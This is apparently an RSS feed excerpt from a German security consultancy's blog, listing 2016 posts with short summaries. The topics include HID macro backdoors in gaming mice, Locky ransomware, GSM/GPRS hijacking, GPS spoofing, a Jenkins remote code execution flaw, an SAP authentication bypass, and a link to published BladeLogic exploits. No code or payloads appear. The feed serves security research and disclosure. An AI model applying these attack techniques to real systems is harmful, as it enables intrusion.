      <description>&lt;p&gt;Ever got a backdoor installed on your computer by your beloved mouse? Here’s the story of a poor mouse that got really, really sick.&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://www.insinuator.net/wp-content/uploads/2016/07/mouse-300x169.jpg&#34; alt=&#34;Agent &amp;ldquo;Danger Mouse&amp;rdquo;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;Agent “Danger Mouse”&lt;/p&gt;&#xA;&lt;p&gt;Do you remember the times where people put Teensy-boards and USB hubs in their mouses? [Chris? ;)] Their aim was to attach an additional &lt;a href=&#34;https://en.wikipedia.org/wiki/Human_interface_device&#34;&gt;Human Interface Device&lt;/a&gt; (HID, like keyboards or mouses) with some payload in kind of e.g. keystrokes or mouse movements. Also, there are devices available like the USB Rubber Ducky in the housing of a USB thumb drive.&lt;br&gt;&#xA;The principle is easy: The tools are using a programmable microcontroller with the capability to emulate USB HID. That’s it. Just program your board of choice with the payload fitting your needs and plug it in at the target computer. The latter will recognize it as a keyboard/mouse and the payload-keystrokes will be entered.&lt;br&gt;&#xA;But why should external hardware be used? Many modern gaming peripherals provide functions to store macros on them, including enough onboard memory for little payloads.&lt;/p&gt;</description>
    </item>
    <item>
      <title>New Ransomware-Wave Analysis</title>
      <link>https://insinuator.net/2016/07/new-ransomware-wave-analysis/</link>
      <pubDate>Thu, 28 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/new-ransomware-wave-analysis/</guid>
      <description>&lt;p&gt;In the context of a customer project, we examined a new variant of the Locky ransomware. As in the meantime stated by a law enforcement agency, this has been part of a large wave of attacks hitting various enterprises in the night from Tuesday (2016-07-26) to Wednesday.&lt;/p&gt;&#xA;&lt;p&gt;As an initial attack vector, the attackers use emails with an attachment that probably even uses a 0day exploit, that enables the payload to be executed already when displayed in the MS Outlook preview.&lt;/p&gt;</description>
    </item>
    <item>
      <title>REcon 2016 – A Quick Recap</title>
      <link>https://insinuator.net/2016/07/recon-2016-a-quick-recap/</link>
      <pubDate>Mon, 25 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/recon-2016-a-quick-recap/</guid>
      <description>&lt;p&gt;Some of us had the pleasure to visit this year’s &lt;a href=&#34;https://recon.cx/&#34;&gt;REcon&lt;/a&gt; in Montreal, Canada. Unfortunately, work caught us just when we arrived back in Germany, so I haven’t had time to sit down and write down a few words so far. However, we think that what we’ve experienced at REcon is worth writing about.&lt;/p&gt;&#xA;&lt;p&gt;The overall quality of the speakers and talks were very nice. What really amazed me was the art work of REcon:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Notes on Hijacking GSM/GPRS Connections</title>
      <link>https://insinuator.net/2016/07/notes-on-hijacking-gsm/gprs-connections/</link>
      <pubDate>Sun, 17 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/notes-on-hijacking-gsm/gprs-connections/</guid>
      <description>&lt;p&gt;As shown in previous blogposts we regularly work with GSM/GPRS basestations for &lt;a href=&#34;https://www.insinuator.net/2016/05/some-notes-on-utilizing-telco-networks-for-penetration-tests/&#34;&gt;testing devices with cellular uplinks&lt;/a&gt; or to simply run a &lt;a href=&#34;https://www.insinuator.net/2016/03/troopers16-gsm-network/&#34;&gt;private network during TROOPERS&lt;/a&gt;. Here the core difference between a random TROOPERS attendee and a device we want to hack is the will to join our network, or not! While at the conference we hand out own SIM cards which accept the TROOERPS GSM network as their “home network” some device need to be pushed a little bit.&lt;br&gt;&#xA;Every SIM card has it’s own home network, which is encoded in the fist five (European standard) or six (North American standard) digits of its IMSI – International Subscriber Number. The first three digits are the MCC, the Mobile Country Code, the next two/three the MNC, Mobile Network Code. International network overview are publicly available and for example &lt;a href=&#34;https://www.itu.int/dms_pub/itu-t/opb/sp/T-SP-E.212B-2014-PDF-E.pdf&#34;&gt;can be found &amp;gt;here&amp;lt;&lt;/a&gt;. For instance, Germany has the MCC 262 and Vodafone Germany uses MNC 02. So a SIM card with an IMSI starting with 26202 belongs to them.&lt;br&gt;&#xA;Sticking to the settings in its own SIM card a device will always prefer to connect to it’s own home network above all others. If the home network is not available it will usually go for the strongest signal. To protect users from unnecessary costs, an operator will usually add certain rules to prevent the device from connecting to other networks in the same country. So if you’re an O2 customer in Germany, visit a shopping center and only have reception for a T-Mobile cell, your phone will not directly jump into this network, even though it’s the strongest signal source.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Gotta Catch ‘Em All! – WORLDWIDE! (or how to spoof GPS to cheat at Pokémon GO)</title>
      <link>https://insinuator.net/2016/07/gotta-catch-em-all-worldwide-or-how-to-spoof-gps-to-cheat-at-pok%C3%A9mon-go/</link>
      <pubDate>Fri, 15 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/gotta-catch-em-all-worldwide-or-how-to-spoof-gps-to-cheat-at-pok%C3%A9mon-go/</guid>
      <description>&lt;p&gt;The moment, when your team leader asks you to cheat at Pokémon GO…everyone knows it, right? No? Well, I do 😉&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://www.insinuator.net/wp-content/uploads/2016/07/setup_edit-300x169.jpg&#34; alt=&#34;GPS Spoofing Setup&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;GPS Spoofing Setup&lt;/p&gt;&#xA;&lt;p&gt;As I’m not a gamer, the technical part was of much more interest – that’s the real gaming for me.&lt;br&gt;&#xA;So, challenge accepted!&lt;/p&gt;&#xA;&lt;p&gt;In the past I was often fiddling around with SDR (Software Defined Radio), started with DVB-T sticks some years ago. When I came to ERNW in 2014 I got in touch with &lt;a href=&#34;http://greatscottgadgets.com/hackrf/&#34;&gt;Michael Ossman’s great HackRF One&lt;/a&gt; for the first time, and subsequently my thesis was based on SDR.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Jenkins Remoting RCE II – The return of the ysoserial</title>
      <link>https://insinuator.net/2016/07/jenkins-remoting-rce-ii-the-return-of-the-ysoserial/</link>
      <pubDate>Fri, 01 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/jenkins-remoting-rce-ii-the-return-of-the-ysoserial/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;https://www.insinuator.net/wp-content/uploads/2016/06/headshot.png&#34; alt=&#34;Jenkins Logo&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://jenkins-ci.org/&#34;&gt;Jenkins&lt;/a&gt; is a continuous integration server, widely used in Java environments for building automation and deployment. The project recently disclosed an unauthenticated remote code execution vulnerability discovered by Moritz Bechler. Depending on the development environment, a Jenkins server can be a critical part of the infrastructure: It often creates the application packages that later will be deployed on production application servers. If an attacker can execute arbitrary code, s/he can easily manipulate those packages and inject additional code. Another scenario would be that the attacker stealing credentials, like passwords, private keys that are used for authentication in the deployment process or similar.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SnoopCon Guest Day</title>
      <link>https://insinuator.net/2016/07/snoopcon-guest-day/</link>
      <pubDate>Fri, 01 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/snoopcon-guest-day/</guid>
      <description>&lt;p&gt;This year I had the pleasure to join the guest day of BT’s SnoopCon. There were quite a number of interesting talks throughout the day such as&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/therealsaumil&#34;&gt;Saumil Shah&lt;/a&gt;‘s presentation on Stegosploit (as well as his rant about the state of information security)&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/drgfragkos&#34;&gt;Dr. Grigorios Fragkos&lt;/a&gt;‘ talk on airplane security (where he presented some maybe not-so-pleasant but also some good-to-hear facts on the security posture of airplanes)&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/dominicgs&#34;&gt;Dominic Spill&lt;/a&gt;‘s demonstration of tools and methods used to reverse engineer RF protocols&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/hackerfantastic&#34;&gt;Hacker Fantastic&lt;/a&gt;‘s talk on how to use the AX.25 protocol to bounce radio signals off the ISS to communicate with systems around the world&lt;/li&gt;&#xA;&lt;li&gt;Kostas Litovois’ and Vincent Yiu’s presentation on #WePWNise, a tool that can be used to efficiently create malicious VBA macros (by taking EMET configuration details into account)&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/bryanfite&#34;&gt;Bryan Fite&lt;/a&gt;‘s talk on how we have to think about Safety, Security, and Privacy in the IoT age.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;I really enjoyed the talks and had a great time! Thanks to all the organizers and speakers!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some infos about SAP Security Note 2258786</title>
      <link>https://insinuator.net/2016/06/some-infos-about-sap-security-note-2258786/</link>
      <pubDate>Thu, 30 Jun 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/06/some-infos-about-sap-security-note-2258786/</guid>
      <description>&lt;p&gt;On the 8th of March SAP released the security note for a vulnerability we reported during an assessment of a SAP landscape. The issue affects the SAP NetWeaver Web Administration Interface.  By knowing a special URL a malicious user can acquire version information about the services enabled in the SAP system as well as the operating system used.  We wanted to share some details on the issue.&lt;/p&gt;&#xA;&lt;p&gt;The vulnerability is a bypass of the HTTP Basic Authorization for the &lt;a href=&#34;https://help.sap.com/saphelp_nw73/helpdata/en/4b/c1cd5cfb0050e9e10000000a15822b/content.htm?frameset=/en/48/3e191a252f72d0e10000000a42189c/frameset.htm&amp;amp;current_toc=/en/62/d678c5330a4992bc6fe927e6137c9d/plain.htm&amp;amp;node_id=155&amp;amp;show_children=false&#34;&gt;SAP Web Administration Interface&lt;/a&gt;. It discloses version information about the system respectively operating system, a brief SAP patch level overview and running services including their corresponding ports.&lt;/p&gt;</description>
    </item>
    <item>
      <title>VoLTE Security Analysis, part 2</title>
      <link>https://insinuator.net/2016/06/volte-security-analysis-part-2/</link>
      <pubDate>Fri, 24 Jun 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/06/volte-security-analysis-part-2/</guid>
      <description>&lt;p&gt;In our talk &lt;em&gt;&lt;a href=&#34;https://www.ernw.de/download/telco/ERNW_Area41_IMSecure.pdf&#34;&gt;IMSEcure – Attacking VoLTE&lt;/a&gt;&lt;/em&gt; Brian and me presented some theoretical and practical attacks against IP Multimedia Subsystems (IMS). Some of the attacks already have been introduced in a former &lt;a href=&#34;https://www.insinuator.net/2016/01/security-analysis-of-volte-part-1/&#34;&gt;blogpost&lt;/a&gt; and Ahmad &lt;a href=&#34;https://www.insinuator.net/2016/02/denial-of-service-attacks-on-volte/&#34;&gt;continued&lt;/a&gt; with a deeper analysis of the Flooding and targeted DoS scenario. But still, there are some open topics I’d like to continue with now. The methods I am demonstrating here also help to get a better understanding of VoLTE/IMS and how it is implemented on modern smartphones.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Area41 Conference 2016</title>
      <link>https://insinuator.net/2016/06/area41-conference-2016/</link>
      <pubDate>Sat, 18 Jun 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/06/area41-conference-2016/</guid>
      <description>&lt;p&gt;Last Friday, Brian and I were at the  Area41 Security Conference. The conference is a branch of Defcon conference and is more or less a small conference of the Swiss hacker community. Being in a “rock music club”, the speakers presented on a stage where usually the rock stars are performing – which gives the conference a very special flair and an interesting atmosphere. We’ve been at the &lt;a href=&#34;http://area41.io/speakers/#hendrikschmidt&#34;&gt;conference&lt;/a&gt; to present our research about VoLTE technology including some attack scenarios we’ve evaluated in the &lt;a href=&#34;https://www.insinuator.net/2016/01/security-analysis-of-volte-part-1/&#34;&gt;past&lt;/a&gt;. More on this later, let’s first talk about the conference itself.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SAMLReQuest Burpsuite Extention</title>
      <link>https://insinuator.net/2016/06/samlrequest-burpsuite-extention/</link>
      <pubDate>Mon, 06 Jun 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/06/samlrequest-burpsuite-extention/</guid>
      <description>&lt;p&gt;Security Assertion Markup Language (SAML) is an XML standard for exchanging authentication and authorization data between a Service Provider (SP) and an  Identification Provider (IdP). SAML is used in many Single Sign-On (SSO) implementations, when a user is authenticated once by IdP to access multiple related SPs. When a user requests to access a SP, it creates a SAML Authentication Request and redirects the user to IdP to be authenticated according to this authentication request. If the user is successfully authenticated, IdP creates a SAML authentication response and sends it back to SP through the user’s browser.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 &amp; Threat Intelligence</title>
      <link>https://insinuator.net/2016/06/ipv6-threat-intelligence/</link>
      <pubDate>Fri, 03 Jun 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/06/ipv6-threat-intelligence/</guid>
      <description>&lt;p&gt;Tomorrow, I will join a meeting where I’m expected to contribute, amongst others, to a discussion on the impact of IPv6 on threat intelligence. To prepare for that I started putting together some thoughts &amp;amp; ideas on the topic, and I even thought I might share this in a post (the one you read right now ;-), not least to, maybe, stimulate a discussion.&lt;/p&gt;&#xA;&lt;p&gt;I don’t know much about threat intelligence so it might happen that, at times, I use some misguided terms or I expose a (too) naïve understanding of some concepts. Happy to be corrected in one way or another.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The ULIN Story</title>
      <link>https://insinuator.net/2016/06/the-ulin-story/</link>
      <pubDate>Fri, 03 Jun 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/06/the-ulin-story/</guid>
      <description>&lt;p&gt;Some of you might have noticed the &lt;a href=&#34;http://www.forbes.com/sites/thomasbrewster/2016/05/31/ability-unlimited-spy-system-ulin-ss7/&#34;&gt;articles&lt;/a&gt;, or the leaked &lt;a href=&#34;https://www.documentcloud.org/documents/2843200-ULIN-Manual.html&#34;&gt;manual&lt;/a&gt; itself, about a tool called ULIN. ULIN is a “bleeding-edge spy tool” for mobile communication networks. According to the manual, it is aimed to be a surveillance software for agencies (or others with enough money) for tracking and intercepting the Voice Calls and SMS of arbitrary phones. They call this “remote recording and geolocation of mobile handsets using 2G/3G/4G networks”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>New Methods for Exploiting ORM Injections in Java Applications (HITB16)</title>
      <link>https://insinuator.net/2016/06/new-methods-for-exploiting-orm-injections-in-java-applications-hitb16/</link>
      <pubDate>Thu, 02 Jun 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/06/new-methods-for-exploiting-orm-injections-in-java-applications-hitb16/</guid>
      <description>&lt;p&gt;The HITBSecConf or “Hack In The Box” in Amsterdam is a well known security conference in Europe. We also attended this year too, and there were quite some interesting talks at the HITBSecConf16 conference. One of the talks was about “New Methods for Exploiting ORM Injections in Java Applications” by the security researchers Mikhail Egorov and Sergey Soldatov.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;I. What is Object-Relational Mapping (ORM)?&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;ORM stands for Object-Relational Mapping, which is a technique that automatically converts data from a relational database management system (RDBMS) into objects. This is often used in business applications of today.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Implementing an Obsolete VPN Protocol on Top of HTTP: Because Why Not?</title>
      <link>https://insinuator.net/2016/05/implementing-an-obsolete-vpn-protocol-on-top-of-http-because-why-not/</link>
      <pubDate>Tue, 31 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/implementing-an-obsolete-vpn-protocol-on-top-of-http-because-why-not/</guid>
      <description>&lt;p&gt;Recently I’ve started some research on MikroTik’s RouterOS, the operating system that ships with RouterBOARD devices. As I’m running such a device myself, one day I got curious about security vulnerabilities that have been reported on the operating system and the running services as it comes with tons of &lt;a href=&#34;http://wiki.mikrotik.com/wiki/Manual:RouterOS_features&#34;&gt;features&lt;/a&gt;. Searching for known vulnerabilities in RouterOS on Google doesn’t really yield a lot of recent security related stuff. So I thought, there is either a lack of (public) research or maybe it is super secure… 🙂&lt;/p&gt;</description>
    </item>
    <item>
      <title>CVE-2016-1409 – IPv6 NDP DoS Vulnerability in Cisco Software</title>
      <link>https://insinuator.net/2016/05/cve-2016-1409-ipv6-ndp-dos-vulnerability-in-cisco-software/</link>
      <pubDate>Mon, 30 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/cve-2016-1409-ipv6-ndp-dos-vulnerability-in-cisco-software/</guid>
      <description>&lt;p&gt;Dear readers,&lt;/p&gt;&#xA;&lt;p&gt;As you may have already noticed, Cisco released an urgent &lt;a href=&#34;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160525-ipv6&#34;&gt;security advisory&lt;/a&gt; describing an IPv6 Neighbor Discovery DoS Vulnerability in several flavors of Cisco’s operating systems. Currently IOS-XR, XE and NX-OS are affected while ASA and “classic” IOS are under investigation. At first glance, it might look like yet another IPv6 DoS vulnerability. Looking closer, Cisco is mentioning an unauthenticated, remote attacker due to insufficient processing logic for crafted IPv6 NDP packets that are sent to an affected device. Following the public discussion about the vulnerability, it seems that these packets will reach the, probably low rate-limited, &lt;a href=&#34;https://supportforums.cisco.com/document/93456/asr9000xr-local-packet-transport-services-lpts-copp&#34;&gt;LPTS&lt;/a&gt; filter/queue on IOS XR devices “crowding” out legitimate NDP packets resulting in a DoS for IPv6 traffic, or in general a high CPU load as these packets will be processed by the CPU. More details are currently not available, but this might indicate the affected systems aren’t doing proper message validation checks on NDP packets (in addition to the LPTS filter/queue problem).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Telescope – Peering Into the Depths of TLS Traffc in Real-Time (HITB16)</title>
      <link>https://insinuator.net/2016/05/telescope-peering-into-the-depths-of-tls-traffc-in-real-time-hitb16/</link>
      <pubDate>Mon, 30 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/telescope-peering-into-the-depths-of-tls-traffc-in-real-time-hitb16/</guid>
      <description>&lt;p&gt;Last week we have visited the HITBSecConf16 – conference in Amsterdam.&lt;br&gt;&#xA;There were many interesting talks, and in this post I am going to tell you about a talk held by Radu Caragea – “Telescope: Peering Into the Depths of TLS Traffic in Real-Time”.&lt;/p&gt;&#xA;&lt;p&gt;While performing a dynamic malware analysis one often needs to analyze network traffic in order to determine malware communication with C&amp;amp;C servers, to observe the malware delivery from sites, or to investigate honeypot traffic under TLS.&lt;br&gt;&#xA;There are already existing solutions to help with this task. However in the given talk considering virtual environments the speaker presented a novel technique that works for virtualized machines with a minimal overhead, and is actually OS-agnostic and crypto-library-agnostic.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Beauty of IPv6 Link-Local Addressing. Not</title>
      <link>https://insinuator.net/2016/05/the-beauty-of-ipv6-link-local-addressing.-not/</link>
      <pubDate>Sat, 28 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/the-beauty-of-ipv6-link-local-addressing.-not/</guid>
      <description>&lt;p&gt;In November 2014, after quite some controversy in the IETF OPSEC working group (for those interested look at the &lt;a href=&#34;http://www.ietf.org/mail-archive/web/opsec/current/maillist.html&#34;&gt;archives&lt;/a&gt;), the &lt;em&gt;Informational&lt;/em&gt; &lt;a href=&#34;https://tools.ietf.org/rfc/rfc7404.txt&#34;&gt;RFC 7404&lt;/a&gt; “Using Only Link-Local Addressing inside an IPv6 Network” was published. It is authored by &lt;a href=&#34;http://blogs.cisco.com/author/michaelbehringer&#34;&gt;Michael Behringer&lt;/a&gt; and &lt;a href=&#34;https://twitter.com/evyncke&#34;&gt;Eric Vyncke&lt;/a&gt; and discusses the advantages &amp;amp; disadvantages of an approach using “only link-local addresses on infrastructure links between routers”.&lt;/p&gt;&#xA;&lt;p&gt;So it’s (merely) about “infrastructure links” which some people call “transit networks” or “point to point” (ptp) links. I’m aware that there might be subtle differences between all these, depending on your specific use of the terms. Still I assume that most readers will have an understanding of what types of links are in focus of the RFC, and subsequently of this post.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Notes on Utilizing Telco Networks for Penetration Tests</title>
      <link>https://insinuator.net/2016/05/some-notes-on-utilizing-telco-networks-for-penetration-tests/</link>
      <pubDate>Wed, 25 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/some-notes-on-utilizing-telco-networks-for-penetration-tests/</guid>
      <description>&lt;p&gt;After a couple of years in pentesting Telco Networks, I’d like to give you some insight into our pentesting methodology and setup we are using for testing “Mobile and Telecommunication Devices”. I am not talking about pentesting professional providers’ equipment (as in previous blogposts), it is about pentesting of devices that have a modem in place like a lot of IoT devices (you know about the fridge having a GSM Modem, right?) do.&lt;/p&gt;</description>
    </item>
    <item>
      <title>WPAD Name Collision Vulnerability (TA16-144A)</title>
      <link>https://insinuator.net/2016/05/wpad-name-collision-vulnerability-ta16-144a/</link>
      <pubDate>Tue, 24 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/wpad-name-collision-vulnerability-ta16-144a/</guid>
      <description>&lt;p&gt;Yesterday the US-CERT released a &lt;a href=&#34;https://www.us-cert.gov/ncas/alerts/TA16-144A&#34;&gt;Technical Alert&lt;/a&gt; (TA16-144A) about the recently found WPAD Name Collision Vulnerability. We will give you a summary about the vulnerability as well as the basic mechanisms here.&lt;/p&gt;&#xA;&lt;h2 id=&#34;wpad&#34;&gt;WPAD&lt;/h2&gt;&#xA;&lt;p&gt;The Web Proxy Auto-Discovery Protocol is used to auto-configure the proxy for web browsers. So when joining the according network the browser can use DHCP and DNS methods to find a specific configuration file (typically named wpad.dat), which is loaded and applied to the browser’s settings. Therefore, there is no need to configure each browser in your environment individually/manually.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BMC BladeLogic Vulnerabilities PoCs</title>
      <link>https://insinuator.net/2016/05/bmc-bladelogic-vulnerabilities-pocs/</link>
      <pubDate>Mon, 23 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/bmc-bladelogic-vulnerabilities-pocs/</guid>
      <description>&lt;p&gt;Hi everyone!&lt;/p&gt;&#xA;&lt;p&gt;A quick update: earlier in our blog we released &lt;a href=&#34;https://www.insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/&#34;&gt;BMC BladeLogic: CVE-2016-1542 and CVE-2016-1543&lt;/a&gt; vulnerabilities. Now the exploits are also available in our &lt;a href=&#34;https://github.com/ernw/insinuator-snippets/tree/master/bmc_bladelogic&#34;&gt;github&lt;/a&gt; if you want to check your systems 😉&lt;/p&gt;&#xA;&lt;p&gt;Have a nice week,&lt;br&gt;&#xA;Olga&lt;/p&gt;</description>
    </item>
    <item>
      <title>Introduction of a new hardware guy</title>
      <link>https://insinuator.net/2016/05/introduction-of-a-new-hardware-guy/</link>
      <pubDate>Wed, 18 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/introduction-of-a-new-hardware-guy/</guid>
      <description>&lt;p&gt;Hi folks!&lt;/p&gt;&#xA;&lt;p&gt;We couldn’t be more proud to welcome such a predestined #1 hardware hacking victim, than &lt;strong&gt;VICTor&lt;/strong&gt; is!&lt;br&gt;&#xA;Before Brian and I gave a lecture on hardware hacking last week at &lt;a href=&#34;https://www.mosbach.dhbw.de&#34;&gt;DHBW Mosbach&lt;/a&gt;, we felt, that we needed a custom victim which is fully documented and provides a good “hackability” to the students.&lt;br&gt;&#xA;Surely we could also have used some cheap $wifi_ap, but here’s the thing: Would you really want to use a device which you don’t really know? Mostly, there’s a massive lack of documentation regarding the SoCs used…not to mention the unavailability of schematics and layouts.&lt;br&gt;&#xA;As we wanted to teach students the basics of hardware hacking effectively, we decided to create something by ourselves.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Review about the System and Security Info iOS App from SektionEins GmbH</title>
      <link>https://insinuator.net/2016/05/review-about-the-system-and-security-info-ios-app-from-sektioneins-gmbh/</link>
      <pubDate>Wed, 18 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/review-about-the-system-and-security-info-ios-app-from-sektioneins-gmbh/</guid>
      <description>&lt;p&gt;Dear readers of Insinuator,&lt;/p&gt;&#xA;&lt;p&gt;Today I want to give a little review about the latest app released by SektionEins called “System and Security Info” due to its recent media appearance. So first of all the app can be obtained via the Apple App store for 0,99€ at the time this article was written. This article will try to answer two basic questions: for whom (or “which groups of people”) is this app helpful, and which security features does this app actually has. The design of the app is straight forward and pretty minimalistic with a clean and modern design. The first page of the Application called “Overview” provides nothing more than the current CPU usage of the device, with detailed subdivision in User, Idle, Total and Load. The next section provides an overview about the used RAM divided into Wire, Active RAM usage, Inactive RAM usage, “other”, free and the total amount of the device’s ram. The next option shows the used and unused part of the devices available storage, with “used”, “free” and total amount of space. While these features can be handled with several other (free and open source) applications I won’t write a comment wether it  these components make sense.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Because of Cyber – A Recap</title>
      <link>https://insinuator.net/2016/05/because-of-cyber-a-recap/</link>
      <pubDate>Wed, 11 May 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/05/because-of-cyber-a-recap/</guid>
      <description>&lt;p&gt;Troopers16 has been over for quite a while now, but because sharing is caring, we would like to give you some more insight and share some gems that happened over the 2 days of us running a small/medium sized enterprise in mid-west Russia as part of the well received FishBowl side story.&lt;/p&gt;&#xA;&lt;p&gt;Technology wise the whole infrastructure of FishBowl, as well as the Cyber Emergency Response Team, was hosted on one FreeBSD machine with exception of the challenge scoreboard which was on site only, hence conference network only.&lt;br&gt;&#xA;The C.E.R.T. web site was static web site using the &lt;a href=&#34;jekyllrb.com&#34;&gt;jekyll&lt;/a&gt; engine. FishBowl on the other hand required some dynamic web magic which is why we choose to use the &lt;a href=&#34;http://flask.pocoo.org/&#34;&gt;flask framework&lt;/a&gt;. For the FishBowl web design we simply helped ourselves with the styles of the &lt;a href=&#34;https://www.troopers.de&#34;&gt;Troopers web site&lt;/a&gt;, who of you noticed? 😉&lt;br&gt;&#xA;All web related stuff was reverse proxied by an &lt;a href=&#34;http://nginx.org/&#34;&gt;nginx&lt;/a&gt; to provide a common layer of technology even though every venture was segregated into its own FreeBSD jail environment.&lt;br&gt;&#xA;For mail a simple postfix setup was set up. Having a proper mail server for such »shenanigans« turned out to be very enjoyable, but more on that later.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How ‘security’ black boxes might corrupt your investment</title>
      <link>https://insinuator.net/2016/04/how-security-black-boxes-might-corrupt-your-investment/</link>
      <pubDate>Fri, 29 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/how-security-black-boxes-might-corrupt-your-investment/</guid>
      <description>&lt;p&gt;Usually I’m not the kind of guy who talks about such economic topics. Because I’m an engineer / security researcher who is exclusively concerned with understanding technical problems and if possible, solving them accordingly. My whole education is based on this and contains predominantly technical aspects of information security. This sometimes makes it difficult to understand what the market cares about (and why some products are being developed / exist on the market 😉 ). Nevertheless, a current engagement for one of our customers made me stumble upon such a product.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Trip to Hannover Messe</title>
      <link>https://insinuator.net/2016/04/a-trip-to-hannover-messe/</link>
      <pubDate>Wed, 27 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/a-trip-to-hannover-messe/</guid>
      <description>&lt;p&gt;Once every few years I decide to head to Hannover and attend &lt;a href=&#34;http://www.hannovermesse.de/&#34;&gt;Hannover Messe&lt;/a&gt;, probably the largest industrial trade fair in Germany and apparently on of the most important in the world. As this year’s main topic was “Industrie 4.0” I simply could not resist to go out on a hunt for new and interesting (secure) smart connected magic! And trust me, I was not disappointed – here’s a few of my impressions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SAP Security @ Troopers16</title>
      <link>https://insinuator.net/2016/04/sap-security-@-troopers16/</link>
      <pubDate>Mon, 25 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/sap-security-@-troopers16/</guid>
      <description>&lt;p&gt;When it comes to SAP, Troopers has two events that are about Security in SAP Systems in particular. On the first day of the Troopers16 Trainings the BIZEC workshop takes place. The second event is a dedicated SAP track during the conference. Apart from these events there were of course a lot of nice folks to talk to (about SAP) 🙂 This post is a short overview about SAP security &lt;a href=&#34;https://www.troopers.de/troopers16/&#34;&gt;@ TROOPERS16.&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Defense &amp; Management Day 2</title>
      <link>https://insinuator.net/2016/04/defense-management-day-2/</link>
      <pubDate>Fri, 15 Apr 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/04/defense-management-day-2/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://www.troopers.de/troopers16/&#34;&gt;TROOPERS16&lt;/a&gt; offered many different speakers from around the globe. Below are three different talks from the afternoon of Day 2’s Defense and Management Track. &lt;/p&gt;&#xA;&lt;p&gt;===&lt;/p&gt;&#xA;&lt;p&gt;The TROOPERS16 talk “&lt;a href=&#34;https://www.troopers.de/events/troopers16/629_attacking__protecting_big_data_environments/&#34;&gt;Attacking &amp;amp; Protecting Big Data Environments&lt;/a&gt;” presented the research of Birk Kauer and Matthias Luft, (&lt;a href=&#34;http://ernw.de&#34;&gt;ERNW&lt;/a&gt;) in which they showed how enterprise-grade “big data” environments, based on e.g. HortonWorks or Cloudera, comprising of components such as HDFS, Yarn, Hue, Flume, Hive, Spark, Sentry/Ranger could be attacked. These environments typically process huge amounts of data. The data is either stored in a cluster file system or streamed into clusters. The processing of these datasets are done by jobs, and these jobs can be arbitrary code execution.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Infiltrate and Syscan 360</title>
      <link>https://insinuator.net/2016/04/infiltrate-and-syscan-360/</link>
